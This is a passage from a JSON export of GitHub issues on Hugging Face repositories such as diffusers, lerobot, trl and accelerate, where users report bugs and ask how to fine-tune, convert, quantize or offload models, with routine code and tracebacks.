    "body": "Probably a stupid question, but I'm trying to upload a .csv dataset and fine-tune an 8B model in Autotrain. But when I add the model name taken from Ollama (e.g. deepseek-r1:8b or DeepSeek-R1-Distill-Llama-8B-NexaQuant) and try to train, I get an error. \n\n  validated_self = self.__pydantic_validator__.validate_python(data, self_instance=self)\npydantic_core._pydantic_core.ValidationError: 1 validation error for LLMTrainingParams\ntoken\n  Input should be a valid string [type=string_type, input_value=, input_type=_TemplateResponse]\n    For further information visit https://errors.pydantic.dev/2.10/v/string_type\n\nI'm too stupid to know what's wrong or how to correct it, so any help gratefully received. I can fine-tune with existing models in the drop-down list OK, so the setup seems to be working.",
    "url": "https://github.com/huggingface/autotrain-advanced/issues/869",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-14T14:46:23Z",
    "updated_at": "2025-05-03T15:01:33Z",
    "user": "nigelp"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11060,
    "title": "`prepare_image` in Kandinsky pipelines doesn't support `torch.Tensor`",
    "body": "Hi, I want to report a bug in Kandinsky pipelines.\n\nhttps://github.com/huggingface/diffusers/blob/2f0f281b0d808c05bc7a974e68d298a006dd120a/src/diffusers/pipelines/kandinsky/pipeline_kandinsky_img2img.py#L413-L420\n\nAccording to the above contents, elements in `image` can be either `PIL.Image.Image` or `torch.Tensor`.\n\nhttps://github.com/huggingface/diffusers/blob/2f0f281b0d808c05bc7a974e68d298a006dd120a/src/diffusers/pipelines/kandinsky/pipeline_kandinsky_img2img.py#L98-L104\n\nHowever, the `prepare_image` function is only for `PIL.Image.Image`, and does not support `torch.Tensor`.\n\nCan you resolve this problem by implementing an image resize function for `torch.Tensor`?",
    "url": "https://github.com/huggingface/diffusers/issues/11060",
    "state": "closed",
    "labels": [
      "good first issue",
      "help wanted"
    ],
    "created_at": "2025-03-14T10:34:30Z",
    "updated_at": "2025-04-21T18:41:10Z",
    "comments": 1,
    "user": "dk-hong"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 39,
    "title": "How to choose ExprExtractionConfig() and LatexExtractionConfig()",
    "body": "Hi. Thanks for your awesome tool. \n\nI want to ask how I should set the configuration when the answer is either LaTeX or Expr? I found that if the case below (without $$ $$) is not set, the output will be false when the expected result is true.\n\n```python\nfrom math_verify import parse, verify\n\ngold = parse(\"\\\\frac{\\sqrt{3}}{3}\")\nanswer = parse(\"sqrt(3)/3\")\n\n# Order here is important!\nverify(gold, answer)\n```",
    "url": "https://github.com/huggingface/Math-Verify/issues/39",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-13T23:36:27Z",
    "updated_at": "2025-04-28T20:42:03Z",
    "user": "Zhuofeng-Li"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11055,
    "title": "Training on unconditional image generation creates colorized images",
    "body": "### Describe the bug\n\nHi, I'm trying to follow the tutorial from unconditional image generation on my own dataset, and I'm getting weirdly colored images. I originally thought it was due to RGB/BGR channel order, but I've switched it around and got the same result. Do you have any suggestions of how to fix it? \n\n### Reproduction\n\nNA\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNA\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11055",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-13T20:47:22Z",
    "updated_at": "2025-04-13T15:02:53Z",
    "comments": 1,
    "user": "esizikova-fda"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 860,
    "title": "Modify camera async_read/read API to return a dictionary instead of tuple for better compatability?",
    "body": "Currently the intel real sense camera api supports returning either a single rgb image or a rgb image and depth image as a 2-uple\n\nhttps://github.com/huggingface/lerobot/blob/3c0a209f9fac4d2a57617e686a7f2a2309144ba2/lerobot/common/robot_devices/cameras/intelrealsense.py#L440-L443\n\nHowever this is not super compatible to work with since not all cameras might return two values (open cv one only does rgb?). For a potentially better API would it be possible to have the async read / read functions always return a dictionary instead with some standard names and data types for the types of image data returned?\n\ne.g.\n\n```\nreturn dict(rgb=..., depth=...)\n```\n\nThis way it is also easier for me to check if the returned data has depth data or not. The current solution is a bit complicated as I need to check if its the IntelRealSenseCamera and if its config has use_depth=True or not.\n\nThanks!",
    "url": "https://github.com/huggingface/lerobot/issues/860",
    "state": "closed",
    "labels": [
      "enhancement",
      "question"
    ],
    "created_at": "2025-03-13T18:44:20Z",
    "updated_at": "2025-05-26T09:28:48Z",
    "user": "StoneT2000"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1230,
    "title": "Using background-removal pipeline produces images with 50% opacity",
    "body": "### Question\n\nI have a issue using the background-removal pipeline. Some models returns the exacly same image, but 50% opacite (RGBA: [X, Y, Z, 127]). So other models, returns an error like this: Uncaught Error: Unsupported model type: null transformers:1:670067.\n\nHow can I procede?",
    "url": "https://github.com/huggingface/transformers.js/issues/1230",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-13T17:00:13Z",
    "updated_at": "2025-03-25T22:28:37Z",
    "user": "LuSrodri"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 858,
    "title": "DATASET conversion from V.16 to V2.0 \u274c\u274c\u274c",
    "body": "\nHi @aliberts @Cadene\nThanks for your amazing work. I have one doubt, I forked lerobot repo and training some policies, now i want to convert to V1.6 to V2.0, but my episodes are .pth format not in parquet format. I check remaining issues, i didn't find anything. right now while conversion it takes only parquet format.\nimage\nCan you please help me here\nThanks\n\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\ntried covert_v1_to_v2.py\nBut its expecting only parquet but mine is pth\n\n### Expected behavior\n\n![Image](https://github.com/user-attachments/assets/f682d94d-e540-49c4-ba44-e059c9c073f2)",
    "url": "https://github.com/huggingface/lerobot/issues/858",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-13T15:22:51Z",
    "updated_at": "2025-10-07T02:26:46Z",
    "user": "Kacchan16"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2215,
    "title": "not able to convert DeepSeek-R1 into Onnx using optimum-cli",
    "body": "### System Info\n\n```shell\nv1.24.0\n```\n\n### Who can help?\n\n@michaelbenayoun \n\nI'm trying to convert DeepSeek-R1 into a onnx format, but i'm being presented with \n\n> ValueError: Loading deepseek-ai/DeepSeek-R1 requires you to execute the configuration file in that repo on your local machine. Make sure you have read the code there to avoid malicious use, then set the option `trust_remote_code=True` to remove this error.\n\nI'm trying to do this using optimum-cli\n\n`optimum-cli export onnx --model deepseek-ai/DeepSeek-R1 --task causal-lm C:\\DeepSeek-R1-Onnx`\n\nCan i somehow enable this using cli, or do i have to manually download the model into my system and using cli i would have to perform onnx instead of repo link\n\nif yes, then how can i enable trust_remote_code=True once i download the repo?\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\noptimum-cli export onnx --model deepseek-ai/DeepSeek-R1 --task causal-lm C:\\DeepSeek-R1-Onnx\n\nRunning this command doesn't provide an output\n\n### Expected behavior\n\nThe conversion should start for DeepSeek-R1 to ONNX",
    "url": "https://github.com/huggingface/optimum/issues/2215",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-13T07:07:10Z",
    "updated_at": "2025-05-13T11:13:36Z",
    "comments": 1,
    "user": "volcano619"
  },
  {
    "repo": "huggingface/trl",
    "number": 3066,
    "title": "How to switch on the multi-GPU for GRPOTrainer?",
    "body": "Issue: \nOOM errors during GRPO training - Need multi-GPU support for combined VRAM\n\nProblem Description:\nI'm encountering Out-of-Memory (OOM) errors while using GRPOTrainer to train reasoning capabilities similar to DeepSeek R1.\n\nMy Question:\nHow to switch on multi-GPU support for GRPOTrainer to utilize the combined VRAM across multiple GPUs (e.g., 40GB \u00d7 8 cards = 320GB total VRAM)?\n\nThank you!",
    "url": "https://github.com/huggingface/trl/issues/3066",
    "state": "closed",
    "labels": [
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-03-13T05:01:12Z",
    "updated_at": "2025-04-05T17:04:50Z",
    "user": "tjoymeed"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 314,
    "title": "[QUESTION] agent.run(stream=True)   How get finall result",
    "body": "agent = CodeAgent(\n    tools=[],\n    model=model,\n    max_steps=10,\n    verbosity_level=2\n)\n\nresponse = agent.run(\n    \"\"\"\n    descripe image\n    \"\"\",\n    images=image_urls,\n    stream=True\n)\n\nprint()???",
    "url": "https://github.com/huggingface/agents-course/issues/314",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-13T02:32:47Z",
    "updated_at": "2025-03-13T02:32:47Z",
    "user": "via007"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11046,
    "title": "flux pipeline inference with controlnet, inpainting, plus ip-adapter",
    "body": "### Describe the bug\n\nHi, I would like to utilize flux pipeline. But for now, I have gpu issues to use origin flux pipeline.\nIf I would like to use nf4 version, How can I set up the inference file on controlnet, inpainting, ip-adapter? \nDo I use Fluxcontrol depth or canny and mask, ip-adapter model? or fluxcontrol, fluxfill, ip-adapter?\n\nThanks,\n\n@hlky, @sayakpaul \n\n### Reproduction\n\nimport torch\nfrom diffusers import FluxControlInpaintPipeline\nfrom diffusers.models.transformers import FluxTransformer2DModel\nfrom transformers import T5EncoderModel\nfrom diffusers.utils import load_image, make_image_grid\nfrom image_gen_aux import DepthPreprocessor # https://github.com/huggingface/image_gen_aux\nfrom PIL import Image\nimport numpy as np\n\n\naccess_token = \"\"\npipe = FluxControlInpaintPipeline.from_pretrained(\n    \"black-forest-labs/FLUX.1-Depth-dev\",\n    torch_dtype=torch.bfloat16, token=access_token)\n\n# use following lines if you have GPU constraints\n# ---------------------------------------------------------------\ntransformer = FluxTransformer2DModel.from_pretrained(\n    \"sayakpaul/FLUX.1-Depth-dev-nf4\", subfolder=\"transformer\", torch_dtype=torch.bfloat16\n)\ntext_encoder_2 = T5EncoderModel.from_pretrained(\n    \"sayakpaul/FLUX.1-Depth-dev-nf4\", subfolder=\"text_encoder_2\", torch_dtype=torch.bfloat16\n)\npipe.transformer = transformer\npipe.text_encoder_2 = text_encoder_2\n\n\npipe.enable_model_cpu_offload()\n\n# ---------------------------------------------------------------\npipe.to(\"cuda\")\n\nprompt = \"a blue robot sad expressions\"\nimage = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/robot.png\")\n\nhead_mask = np.zeros_like(image)\nhead_mask[65:580,300:642] = 255\nmask_image = Image.fromarray(head_mask)\n\nprocessor = DepthPreprocessor.from_pretrained(\"LiheYoung/depth-anything-large-hf\")\ncontrol_image = processor(image)[0].convert(\"RGB\")\n\noutput = pipe(\n    prompt=prompt,\n    image=image,\n    control_image=control_image,\n    mask_image=mask_image,\n    num_inference_steps=30,\n    strength=1,\n    guidance_scale=10.0,\n    generator=torch.Generator().manual_seed(42),\n).images[0]\nmake_image_grid([image, control_image, mask_image, output.resize(image.size)], rows=1, cols=4).save(\"output.png\")\n\nchanging depth to canny, and add ip-adapter? \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n.\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11046",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-12T20:14:01Z",
    "updated_at": "2025-04-12T15:02:52Z",
    "comments": 1,
    "user": "john09282922"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 854,
    "title": "How to train diffusion policy in only state space, no images?",
    "body": "I have been having a lot of trouble trying to only train a model on purely a state space task so there are no images involved. I have already looked through every tutorial and most source code files and just can not get this working.\n\nI have a script that creates a LeRobotDataset through human demonstrations. The script is simplified and only contains the relevant information. I simply record 10 demonstrations to create a LeRobotDataset from. There are no images the only observations is a (31, ) numpy float array. \n\n```\nfeature_dict = {\n    \"next.reward\": {\n        \"dtype\": \"float\",\n        \"shape\": (1,),\n        \"names\": None,\n    },\n    \"action\": {\n        \"dtype\": \"float64\",\n        \"shape\": (5, 1),\n        \"names\": None\n    },\n    \"next.success\": {\n        \"dtype\": \"bool\",\n        \"shape\": (1,),\n        \"names\": None,\n    },\n    # \"timestamp\": {\n    #     \"dtype\": \"float32\",\n    #     \"shape\": (1, ),\n    #     \"names\": None,\n    # },\n    \"observation.environment_state\": {\n        \"dtype\": \"float64\",\n        \"shape\": (31, ),\n        \"names\": None\n    },\n    \n}\n\ndataset_le_name = \"second_save\"\ndataset_dir = os.path.join(os.path.dirname(__file__), \"./files/\", dataset_le_name)\n\nle_dataset = LeRobotDataset.create(\n    repo_id=dataset_le_name,\n    fps=500,\n    root=dataset_dir,\n    features=feature_dict\n)\nenv.reset()\n\nfor _ in range(10):\n    while True:\n        step_start = time.time()\n        obs, reward, terminated, _, _ = env.step(None)\n\n        action = teleoperate_command()\n        \n        frame = {\n            \"action\": torch.from_numpy(action),\n            \"next.reward\": np.array([reward]),\n            \"next.success\": np.array([not terminated]),\n            #\"timestamp\": np.array([env.unwrapped.sim_object.data.time], dtype=np.float32).reshape(1,),\n            \"observation.environment_state\": obs,\n            \"task\": \"flick switch\"\n        }\n        le_dataset.add_frame(frame)\n\n        if terminated:\n            print(\"Task completed\")\n            break\n\n  le_dataset.save_episode()\n```\n\n\nThis script works fine and is able to create the dataset with no errors. But then when I try to train a diffusion policy from scratch, the exact example script from https://github.com/huggingface/lerobot/blob/main/examples/3_train_policy.py\n\n\n```# Create a directory to store the training checkpoint.\n    output_directory = Path(\"outputs/train/example_pusht_diffusion\")\n    output_directory.mkdir(parents=True, exist_ok=True)\n\n    # # Select your device\n    device = torch.device(\"cuda\")\n\n    # Number of offline training steps (we'll only do offline training for this example.)\n    # Adjust as you prefer. 5000 steps are needed to get something worth evaluating.\n    training_steps = 5000\n    log_freq = 1\n\n    # When starting from scratch (i.e. 
not from a pretrained policy), we need to specify 2 things before\n    # creating the policy:\n    #   - input/output shapes: to properly size the policy\n    #   - dataset stats: for normalization and denormalization of input/outputs\n    dataset_le_name = \"second_save\"\n    dataset_dir = os.path.join(os.path.dirname(__file__), \"./files/imitationDataset\", dataset_le_name)\n\n    dataset_metadata = LeRobotDatasetMetadata(dataset_le_name, root=dataset_dir)\n    features = dataset_to_policy_features(dataset_metadata.features)\n    output_features = {key: ft for key, ft in features.items() if ft.type is FeatureType.ACTION}\n    input_features = {key: ft for key, ft in features.items() if key not in output_features}\n\n    print(input_features)\n    # Policies are initialized with a configuration class, in this case `DiffusionConfig`. For this example,\n    # we'll just use the defaults and so no arguments other than input/output features need to be passed.\n    cfg = DiffusionConfig(input_features=input_features, output_features=output_features)\n\n\n    # We can now instantiate our policy with this config and the dataset stats.\n    policy = DiffusionPolicy(cfg, dataset_stats=dataset_metadata.stats)\n```\n\nI keep getting the error\n\n```Traceback (most recent call last):\n  File \"path/trainDiffusion.py\", line 105, in \n    main()\n  File \"path/trainDiffusion.py\", line 44, in main\n    policy = DiffusionPolicy(cfg, dataset_stats=dataset_metadata.stats)\n  File \"path/lerobot/lerobot/common/policies/diffusion/modeling_diffusion.py\", line 70, in __init__\n    config.validate_features()\n  File \"pathlerobot/lerobot/common/policies/diffusion/configuration_diffusion.py\", line 220, in validate_features\n    first_image_key, first_image_ft = next(iter(self.image_features.items()))\nStopIteration\n```\n\nLooking at the source code it seems its always checking for image features in the validate feature function, but I just want to train a diffusion policy with no images. How do I do this? ",
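\n\nEdit: for anyone else hitting this, my current guess at a local patch is to guard the image-shape check in validate_features so it only runs when image features exist (sketch against my checkout; I don't know if this is the intended fix):\n\n```python\n# lerobot/common/policies/diffusion/configuration_diffusion.py (sketch)\nif len(self.image_features) > 0:\n    first_image_key, first_image_ft = next(iter(self.image_features.items()))\n    for key, image_ft in self.image_features.items():\n        if image_ft.shape != first_image_ft.shape:\n            raise ValueError(\n                f\"`{key}` does not match `{first_image_key}`, but we expect all image shapes to match.\"\n            )\n```",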
    "url": "https://github.com/huggingface/lerobot/issues/854",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-03-12T16:01:19Z",
    "updated_at": "2025-10-26T02:30:57Z",
    "user": "Nicholas-Baldassini"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11045,
    "title": "Crash when loading Flux Schnell 1 model with train_dreambooth_lora_flux",
    "body": "### Describe the bug\n\nWhen using the `Diffusers/example/dreambooth/train_dreambooth_lora_flux` script with the Flux Schnell 1 model, the process consistently crashes during the transformer shard loading at 33% (1/3), causing my entire Google JupyterLab kernel to crash.\n\n**Question:** Is this related to using the Flux Schnell model instead of a Dev model? Is there a known incompatibility?\n\n**Logs:**  03/12/2025 14:14:26 - INFO - __main__ - Distributed environment: NO\nNum processes: 1\nProcess index: 0\nLocal process index: 0\nDevice: cuda\n\nMixed precision type: bf16\n\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\nYou are using a model of type t5 to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\n{'use_karras_sigmas', 'shift_terminal', 'use_beta_sigmas', 'time_shift_type', 'invert_sigmas', 'use_exponential_sigmas'} was not found in config. Values will be initialized to default values.\n\nLoading checkpoint shards:   0%|                        | 0/2 [00:00\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11045",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-12T15:08:11Z",
    "updated_at": "2025-05-07T15:18:15Z",
    "comments": 4,
    "user": "rleygonie"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11043,
    "title": "When will we be getting Quanto support for Wan 2.1?",
    "body": "The diffusers library for quantizers currently doesn't contain an entry for Quantro:\n\nhttps://github.com/huggingface/diffusers/tree/main/src/diffusers/quantizers\n\nIsn't this needed to perform requantization on a quantized Transformer for WAN 2.1?\n\nCurrently we can't do this due to missing Quanto quantizer after we've quantized and stored a Transformer:\n\n`                print('Quantize transformer')\n                class QuantizedWanTransformer3DModel(QuantizedDiffusersModel):\n                    base_class = WanTransformer3DModel\n                transformer = QuantizedWanTransformer3DModel.from_pretrained(\n                    \"./wan quantro T2V 14B Diffusers/basemodel/wantransformer3dmodel_qint8\"\n                  ).to(dtype=dtype)`",
    "url": "https://github.com/huggingface/diffusers/issues/11043",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-12T12:43:59Z",
    "updated_at": "2025-03-23T18:17:53Z",
    "comments": 2,
    "user": "ukaprch"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 853,
    "title": "How to customize adding other robot and manipulator\uff1f",
    "body": "Thanks for your great work! Now I got a problem how to customize adding other robot and manipulator. \n\nI have 7DOF bimanual manipulators robot, which is powered by servo-motor. I want to add it to lerobot so I can use this fantastic platform to collect data and train. Specially the ACT and diffusion policy.\n\nI have the URDF file, and already setup in ROS moveit and Isaac Sim, using 485 to drive the real robot.\n\nI checked the code and maybe I should crate new yaml file in /configs/robot an some other files for my robot.\n\nWhich is simpler compared to directly collecting data and training with ACT repository? Is there any tutorial on how to add a custom robot for fresh man?\n\nThanks a lot !\n\n![Image](https://github.com/user-attachments/assets/16ad1b01-eb31-40bf-b894-6d7c16a70c99)",
    "url": "https://github.com/huggingface/lerobot/issues/853",
    "state": "closed",
    "labels": [
      "question",
      "robots"
    ],
    "created_at": "2025-03-12T11:39:19Z",
    "updated_at": "2025-10-08T20:16:23Z",
    "user": "meijie-jesse"
  },
  {
    "repo": "huggingface/smollm",
    "number": 65,
    "title": "How to set video size when fine tuning",
    "body": "Hi,\n\nI've tried a bunch of variants but I can't seem to figure out how to set the video size. Currently, I have:\n\n```py\nprocessor.video_size = { \"longest_edge\": 128 }\nprocessor.do_image_splitting = False\n\ndef sample_indices_fn(metadata, num_frames=None, fps=None, **kwargs):\n        return np.arange(0, 20, dtype=int)\n\nmessages = [\n                {\"role\": \"user\", \"content\": [\n                    { \"type\": \"video\", \"path\": example[\"clip_chunked_path\"] },\n                ] },\n                {\n                    \"role\": \"assistant\",\n                    \"content\": [\n                        {\"type\": \"text\", \"text\": json.dumps(last_player_inputs)},\n                    ]\n                }\n            ]\n\ninputs = processor.apply_chat_template(\n                messages,\n                add_generation_prompt=True,\n                tokenize=True,\n                return_dict=True,\n                return_tensors=\"pt\",\n                sample_indices_fn=sample_indices_fn,\n                video_load_backend=\"torchvision\",\n                images_kwargs={ \"max_image_size\": {\"longest_edge\": 128 } }\n                ).to(model.device, dtype=model.dtype)\n\nprint(\"FRAMES\", inputs[\"pixel_values\"].shape)\n```\n\nWhich gives me a pixel_values shape of `[1, 20, 3, 128, 128]` (which is what I want), but then training crashes:\n\n```\n(RayTrainWorker pid=308152, ip=172.31.24.115) /pytorch/aten/src/ATen/native/cuda/IndexKernel.cu:94: operator(): block: [443,0,0], thread: [29,0,0] Assertion `-sizes[i] <= index && index < sizes[i] && \"index out of bounds\"` failed.\n(RayTrainWorker pid=308152, ip=172.31.24.115) /pytorch/aten/src/ATen/native/cuda/IndexKernel.cu:94: operator(): block: [443,0,0], thread: [30,0,0] Assertion `-sizes[i] <= index && index < sizes[i] && \"index out of bounds\"` failed.\n(RayTrainWorker pid=308152, ip=172.31.24.115) /pytorch/aten/src/ATen/native/cuda/IndexKernel.cu:94: operator(): block: [443,0,0], thread: [31,0,0] Assertion `-sizes[i] <= index && index < sizes[i] && \"index out of bounds\"` failed.\n2025-03-12 04:16:13,286 ERROR tune_controller.py:1331 -- Trial task failed for trial TorchTrainer_4b80b_00000\nTraceback (most recent call last):\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/air/execution/_internal/event_manager.py\", line 110, in resolve_future\n    result = ray.get(future)\n             ^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/auto_init_hook.py\", line 21, in auto_init_wrapper\n    return fn(*args, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/client_mode_hook.py\", line 103, in wrapper\n    return func(*args, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/worker.py\", line 2772, in get\n    values, debugger_breakpoint = worker.get_objects(object_refs, timeout=timeout)\n                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/worker.py\", line 919, in get_objects\n    raise value.as_instanceof_cause()\nray.exceptions.RayTaskError(RuntimeError): ray::_Inner.train() (pid=308044, ip=172.31.24.115, actor_id=164821b0515a3af42f0d03bc68000000, repr=TorchTrainer)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File 
\"/home/ray/anaconda3/lib/python3.12/site-packages/ray/tune/trainable/trainable.py\", line 331, in train\n    raise skipped from exception_cause(skipped)\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/train/_internal/utils.py\", line 57, in check_for_failure\n    ray.get(object_ref)\n           ^^^^^^^^^^^^^^^^^^^\n           ^^^^^^^^^^^^^^^^^^^^^\n                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nray.exceptions.RayTaskError(RuntimeError): ray::_RayTrainWorker__execute.get_next() (pid=308152, ip=172.31.24.115, actor_id=3794a93b2a61f6b6efb8496d68000000, repr=)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/train/_internal/worker_group.py\", line 33, in __execute\n    raise skipped from exception_cause(skipped)\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/train/_internal/utils.py\", line 176, in discard_return_wrapper\n    train_func(*args, **kwargs)\n  File \"/tmp/ray/session_2025-03-04_07-50-04_397300_8643/runtime_resources/working_dir_files/_ray_pkg_77cdef2c25570eb4/agent/train_smol.py\", line 214, in train_func\n    trainer.train()\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/transformers/trainer.py\", line 2243, in train\n    return inner_training_loop(\n           ^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/transformers/trainer.py\", line 2554, in _inner_training_loop\n    tr_loss_step = self.training_step(model, inputs, num_items_i",
    "url": "https://github.com/huggingface/smollm/issues/65",
    "state": "open",
    "labels": [
      "Video"
    ],
    "created_at": "2025-03-12T11:20:28Z",
    "updated_at": "2025-07-29T13:12:05Z",
    "user": "FredrikNoren"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3437,
    "title": "Need help on how to disable enable_model_cpu_offload / enable_sequential_cpu_offload",
    "body": "So during my testing when used individually, I observed that\n\nenable_sequential_cpu_offload require- 11 GB VRAM\nenable_model_cpu_offload  require - 8 GB VRAM\n\nI am using Diffusers + nunchaku + sd_embed\n\nProblem: sd_embed does not support enable_sequential_cpu_offload but support enable_model_cpu_offload \n\nRequirement: \n1. Form pipe\n2. Use sd_embed to generate prompt_embeds using enable_model_cpu_offload\n3. Disable enable_model_cpu_offload\n4. Enable enable_sequential_cpu_offload and do inference\n\nSo I tried this code\n1. During prompt_embeds VRAM is ~6 GB\n2. During inference VRAM is ~8GB\n\nNoticed enable_model_cpu_offload is not disabled after invoking optionally_disable_offloading and enabling enable_sequential_cpu_offload. The VRAM requirement remains same as what is needed for enable_model_cpu_offload .\n\nIs this something that is doable or not supported? Any guidance is appreciated.\n\n```python\n\nimport torch\nfrom diffusers import FluxPipeline\nimport torch.nn as nn\nfrom accelerate.hooks import CpuOffload, AlignDevicesHook, remove_hook_from_module\nfrom nunchaku import NunchakuFluxTransformer2dModel, NunchakuT5EncoderModel\nfrom sd_embed.embedding_funcs import get_weighted_text_embeddings_flux1\n\ndef optionally_disable_offloading(_pipeline):\n    is_model_cpu_offload = False\n    is_sequential_cpu_offload = False   \n    if _pipeline is not None:\n        for _, component in _pipeline.components.items():\n            if isinstance(component, nn.Module) and hasattr(component, \"_hf_hook\"):\n                if not is_model_cpu_offload:\n                    is_model_cpu_offload = isinstance(component._hf_hook, CpuOffload)\n                if not is_sequential_cpu_offload:\n                    is_sequential_cpu_offload = isinstance(component._hf_hook, AlignDevicesHook)\n               \n                remove_hook_from_module(component, recurse=True)\n    return (is_model_cpu_offload, is_sequential_cpu_offload)\n\ntransformer = NunchakuFluxTransformer2dModel.from_pretrained(\"mit-han-lab/svdq-int4-flux.1-schnell\")\ntext_encoder_2 = NunchakuT5EncoderModel.from_pretrained(\"mit-han-lab/svdq-flux.1-t5\")\n\npipeline = FluxPipeline.from_pretrained(\n    \"black-forest-labs/FLUX.1-schnell\",\n    text_encoder_2=text_encoder_2,\n    transformer=transformer,\n    torch_dtype=torch.bfloat16,\n)\npipeline.enable_model_cpu_offload()\n\nprompt = \"\"\"\\\nA dreamy, soft-focus photograph capturing a romantic Jane Austen movie scene, \nin the style of Agnes Cecile. Delicate watercolors, misty background, \nRegency-era couple, tender embrace, period clothing, flowing dress, dappled sunlight, \nethereal glow, gentle expressions, intricate lace, muted pastels, serene countryside, \ntimeless romance, poetic atmosphere, wistful mood, look at camera.\n\"\"\"\nprompt_embeds, pooled_prompt_embeds = get_weighted_text_embeddings_flux1(\n    pipe        = pipeline\n    , prompt    = prompt\n)\nprint(\">>>>>>>\", optionally_disable_offloading(pipeline))\n\npipeline.enable_sequential_cpu_offload()\n\nimage = pipeline(\n    prompt_embeds=prompt_embeds,\n    pooled_prompt_embeds=pooled_prompt_embeds,\n    num_inference_steps=4, \n    guidance_scale=3.5,\n    generator=torch.Generator(device=\"cpu\").manual_seed(123456)\n).images[0]\nimage.save(\"flux.1-schnell_sd-embed1.png\")\n\nprompt = \"\"\"\\\nA dreamy, soft-focus photograph capturing a romantic Jane Austen movie scene, \nin the style of Agnes Cecile. 
Delicate watercolors, misty background, \nRegency-era couple, tender embrace, period clothing, flowing dress, dappled sunlight, \nethereal glow, gentle expressions, intricate lace, muted pastels, serene countryside, \ntimeless romance, poetic atmosphere, wistful mood, look at camera.\n\"\"\"\nprint(\">>>>>>>\", optionally_disable_offloading(pipeline))\npipeline.enable_model_cpu_offload()\nprompt_embeds, pooled_prompt_embeds = get_weighted_text_embeddings_flux1(\n    pipe        = pipeline\n    , prompt    = prompt\n)\nprint(\">>>>>>>\", optionally_disable_offloading(pipeline))\npipeline.enable_sequential_cpu_offload()\n\nimage = pipeline(\n    prompt_embeds=prompt_embeds,\n    pooled_prompt_embeds=pooled_prompt_embeds,\n    num_inference_steps=4, \n    guidance_scale=3.5,\n    generator=torch.Generator(device=\"cpu\").manual_seed(12345678)\n).images[0]\nimage.save(\"flux.1-schnell_sd-embed2.png\")\n\n```",
    "url": "https://github.com/huggingface/accelerate/issues/3437",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-12T09:29:08Z",
    "updated_at": "2025-03-12T10:10:33Z",
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11042,
    "title": "ZeroDivisionError when performing forward pass with UNet3DConditionModel",
